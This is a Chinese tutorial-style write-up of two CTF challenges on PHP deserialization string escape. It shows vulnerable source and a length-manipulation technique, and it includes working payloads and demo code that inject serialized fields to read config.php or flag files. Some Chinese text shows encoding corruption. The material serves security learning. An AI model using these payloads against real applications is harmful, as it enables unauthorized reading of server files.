通過(guò)CTF比賽了解PHP反序列化，記錄自己的學(xué)習(xí)。

借用哈大佬們的名言

任何具有一定結(jié)構(gòu)的數(shù)據(jù)，如果經(jīng)過(guò)了某些處理而把結(jié)構(gòu)體本身的結(jié)構(gòu)給打亂了，則有可能會(huì)產(chǎn)生漏洞。

0CTF 2016piapiapia-----反序列化后長(zhǎng)度遞增

安詢杯2019-easy_serialize_php-----反序列化后長(zhǎng)度遞減

0CTF 2016piapiapia

由于是代碼審計(jì),直接訪問(wèn)www.zip發(fā)現(xiàn)備份的源碼,有一下文件,flag就在config.php,因此讀取即可

class.php         //主要有mysql類(mysql基本操作)和user類(繼承mysql實(shí)現(xiàn)功能點(diǎn))
config.php        //環(huán)境配置
index.php         //登陸
profile.php       //查看自己上傳的文件
register.php      //注冊(cè)
update.php        //文件上傳

源碼分析

然后分析代碼,我喜歡通過(guò)功能點(diǎn)來(lái)分析,既然有注冊(cè),登陸,那么自然來(lái)看看SQL咯,發(fā)現(xiàn)class.php中mysql類的filter過(guò)濾函數(shù),過(guò)濾了增刪查改,基本無(wú)望.

后面就看看文件上傳,發(fā)現(xiàn)也對(duì)上傳的文件參數(shù)進(jìn)行了限制,但是發(fā)現(xiàn)對(duì)文件進(jìn)行了序列化處理,那么肯定有反序列化,在profile.php中發(fā)現(xiàn)對(duì)上傳的文件進(jìn)行反序列化處理,并對(duì)文件$profile['photo']進(jìn)行讀取.我們?cè)倩氐轿募蟼鼽c(diǎn),發(fā)現(xiàn)$profile['photo'] = 'upload/' . md5($file['name']);,但是我們無(wú)法獲取加密后的文件值,后面有又看到文件上傳是先序列化,再進(jìn)過(guò)filter函數(shù)替換一些關(guān)鍵字,再反序列化,因此文件可能發(fā)生改變,因此可能有漏洞

payload構(gòu)造

我們知道,PHP反序列化時(shí)以;作為分隔點(diǎn),}做為結(jié)束標(biāo)志,根據(jù)長(zhǎng)度來(lái)判斷讀取多少字符,我們無(wú)法控制$profile['photo']但是可以控制nickname,而nickname又進(jìn)行了長(zhǎng)度限制,strlen函數(shù)卻無(wú)法處理數(shù)組,因此用數(shù)組進(jìn)行繞過(guò)即可我們?cè)谶@里截?cái)?那么后面的則會(huì)被廢棄不再讀取,而我們要構(gòu)造的的payload是,最開(kāi)始的";}是為了閉合前面數(shù)組nickname的{,后面的;}是為了截?cái)?讓反序列化結(jié)束,不再讀取后面的內(nèi)容,當(dāng)然這些都不能是字符哈.

";}s:5:"photo";s:10:"config.php";}

這時(shí)構(gòu)造了payload,那么就要來(lái)計(jì)算溢出數(shù)量了,我們構(gòu)造的payload長(zhǎng)度為34,那么就要增加34個(gè)長(zhǎng)度,由于where變成hacker會(huì)增加一個(gè)長(zhǎng)度,那么我們就需要34個(gè)where,最終payload

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

原理解析

<?php

function filter($string) {
 $escape = array('\'', '\\\\');
 $escape = '/' . implode('|', $escape) . '/';
 $string = preg_replace($escape, '_', $string);

 $safe = array('select', 'insert', 'update', 'delete', 'where');
 $safe = '/' . implode('|', $safe) . '/i';
 return preg_replace($safe, 'hacker', $string);
}

$profile = array(
 'phone'=>'01234567890',
 'email'=>'12345678@11.com',
 'nickname'=>array('wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}'),
 'photo'=>'upload/'.md5('1.jpg')
);
print_r(serialize($profile));
echo PHP_EOL;
print_r(filter(serialize($profile)));
echo PHP_EOL;
var_dump(unserialize(filter(serialize($profile))));
echo PHP_EOL;
?>

輸出結(jié)果展示,最開(kāi)始不用進(jìn)過(guò)filter函數(shù)反序列化時(shí),nickname數(shù)組的第一個(gè)值沒(méi)被截?cái)嗍且粋€(gè)整體wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";},剛好204個(gè)長(zhǎng)度,經(jīng)過(guò)filter過(guò)濾函數(shù)后,where變成了hacker,反序列化的長(zhǎng)度變化了,但是又只讀取204的長(zhǎng)度,則s:5:"photo";s:10:"config.php";}";}就多出來(lái)了,作為另一個(gè)反序列化的其中一個(gè)元素,而末尾的'}又不是字符,因此被認(rèn)為反序列化結(jié)束了,后面的內(nèi)容被丟棄,因此可以任意讀取文件.

a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:15:"12345678@11.com";s:8:"nickname";a:1:{i:0;s:204:"wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/f3ccdd27d2000e3f9255a7e3e2c48800";}

a:4:{s:5:"phone";s:11:"01234567890";s:5:"email";s:15:"12345678@11.com";s:8:"nickname";a:1:{i:0;s:204:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";}s:5:"photo";s:10:"config.php";}";}s:5:"photo";s:39:"upload/f3ccdd27d2000e3f9255a7e3e2c48800";}

array(4) {
 'phone' =>
 string(11) "01234567890"
 'email' =>
 string(15) "12345678@11.com"
 'nickname' =>
 array(1) {
 [0] =>
 string(204) "hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker"
 }
 'photo' =>
 string(10) "config.php"
}

安詢杯2019-easy_serialize_php

源碼

<?php

$function = @$_GET['f'];

function filter($img){
 $filter_arr = array('php','flag','php5','php4','fl1g');
 $filter = '/'.implode('|',$filter_arr).'/i';
 return preg_replace($filter,'',$img);
}


if($_SESSION){
 unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
 echo '<a href="index.php?f=highlight_file" rel="external nofollow" >source_code</a>';
}

if(!$_GET['img_path']){
 $_SESSION['img'] = base64_encode('guest_img.png');
}else{
 $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
 highlight_file('index.php');
}else if($function == 'phpinfo'){
 eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
 $userinfo = unserialize($serialize_info);
 echo file_get_contents(base64_decode($userinfo['img']));
}

分析

源碼不多,我就習(xí)慣先通讀一遍再回溯可能出現(xiàn)的漏洞點(diǎn),找可控參數(shù).通讀完全發(fā)現(xiàn)可能存在的漏洞點(diǎn):extract變量覆蓋,file_get_contents任意文件讀取.

將變量$userinfo['img']逆推回去發(fā)現(xiàn),是由參數(shù)img_path控制的,但是經(jīng)過(guò)sha1加密,我們無(wú)法得知加密后內(nèi)容,但結(jié)合前面的extract變量覆蓋,我們可以自己POST構(gòu)造.

構(gòu)造了之后,會(huì)經(jīng)過(guò)序列化filter函數(shù)替換一些字符(那么此時(shí)序列化后的數(shù)據(jù)則發(fā)生了變化,可能存在漏洞),再反序列化,讀取參數(shù)值.

payload構(gòu)造

我們?nèi)稳焕眯蛄谢?經(jīng)過(guò)過(guò)濾后長(zhǎng)度發(fā)生變化來(lái)構(gòu)造payload,首先明白序列化后,有三個(gè)元素,分別是img,user,function,而我們能控制的只有后面兩個(gè),我們需要構(gòu)造的payload是這樣的

f";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}

但是不經(jīng)任何改變則是這樣的

a:3:{s:4:"user";s:5:"guest";s:8:"function";s:10:"show_image";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}

我還是利用截?cái)嗟乃枷氩蛔屍渥x取元素img的值,我們自己來(lái)構(gòu)造這個(gè)值,只有兩個(gè)參數(shù),必須在function哪里截?cái)?而這個(gè)反序列是長(zhǎng)度遞減,那么就是選擇元素吞噬(吞噬的長(zhǎng)度自己酌情參考,一般是到自己能控制的點(diǎn)就好)后面的長(zhǎng)度,來(lái)構(gòu)造自己的payload咯,我們就選user元素吧,len('";s:8:"function";s:10:"')的長(zhǎng)度為23,但是我們無(wú)法構(gòu)造23個(gè)長(zhǎng)度,我們可以多吞噬一個(gè),24個(gè)字符,那么就用6個(gè)flag就好,但是這樣后面的序列化就混亂了,我們就要添加自己的payload,并補(bǔ)全.雖然這樣補(bǔ)好了,但是只有兩個(gè)元素,這里需要三個(gè)元素,我們就再添加元素,并將后面的img進(jìn)行截?cái)?br /> a:3:{s:4:"user";s:24:"";s:8:"function";s:10:"show_image";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}
a:3:{s:4:"user";s:24:"";s:8:"function";s:2:"22";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}
截?cái)嘀恍鑮即可,并且不為讀取的字符即可,因此添加f";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";},這里我們新增了一個(gè)元素,因此吞噬后function元素消失了,隨便補(bǔ)充好元素即可.

原理解析

<?php

function filter($img){
 $filter_arr = array('php','flag','php5','php4','fl1g');
 $filter = '/'.implode('|',$filter_arr).'/i';
 return preg_replace($filter,'',$img);
}

$arr = array(
 "user"=>"flagflagflagflagflagflag",
 "function"=>'2";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}',
 //"user"=>'guest',
 //"function"=>'show_image',
 "img"=>sha1(base64_encode('guest_img.png'))
);

print_r(serialize($arr));
echo PHP_EOL;
print_r(filter(serialize($arr)));
echo PHP_EOL;
print_r(unserialize(filter(serialize($arr))));

?>

輸出展示

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:62:"2";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}
a:3:{s:4:"user";s:24:"";s:8:"function";s:62:"2";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:3:"tql";s:3:"tql";}";s:3:"img";s:40:"1b75545ff7fcd63fb78a7e4f52a0500d4f39b8f5";}
Array
(
    [user] => ";s:8:"function";s:62:"2
    [img] => ZDBnM19mMWFnLnBocA==
    [tql] => tql
)

總結(jié)

到此這篇關(guān)于PHP反序列化字符串逃逸的文章就介紹到這了,更多相關(guān)PHP反序列化內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

最新評(píng)論